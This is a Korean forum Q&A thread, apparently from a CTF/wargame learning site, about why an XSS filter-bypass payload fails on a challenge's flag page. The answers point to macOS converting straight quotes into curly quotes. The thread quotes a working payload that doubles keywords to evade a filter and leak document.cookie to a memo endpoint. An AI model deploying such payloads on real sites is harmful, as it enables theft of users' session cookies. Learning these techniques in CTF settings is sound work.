필터링 우회 관련해서 질문이 있습니다
답변 2 · 추천 0 · 조회 470
XSS Filtering Bypass

<scrscriptipt>locatioonn.href=’/memo?memo=’ +document.cookie</scriscriptpt>

요런식으로 vuln페이지에서 잘 넘어가는거같던데 flag에 했을당시 hello로 뜨더라구요...
이유를 알수 있을까요??

#web
2023.01.21. 06:46
작성자 정보
답변 2
avatar
Xion
대표 업적 없음

코드 상으로도 문제가 없고 동일한 payload로 전달해봐도 잘 작동합니다.
flag 페이지에서 전달한 param이 정확히 <scrscriptipt>locatioonn.href='/memo?memo='+document.cookie</scriscriptpt> 가 맞는지 확인해보시면 되겠습니다.

2023.01.25. 12:40
sehy0ung
대표 업적 없음

- > ' 이걸로 바꿔서 시도해보세요

mac 설정 -> 키보드 -> 텍스트
스크린샷 2023-01-25 오후 3.08.28.png

스크린샷 2023-01-25 오후 3.08.41.png

mac 에선 '로 자동 변경되어서 설정해주셔야 합니다 :)

2023.01.25. 15:11
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기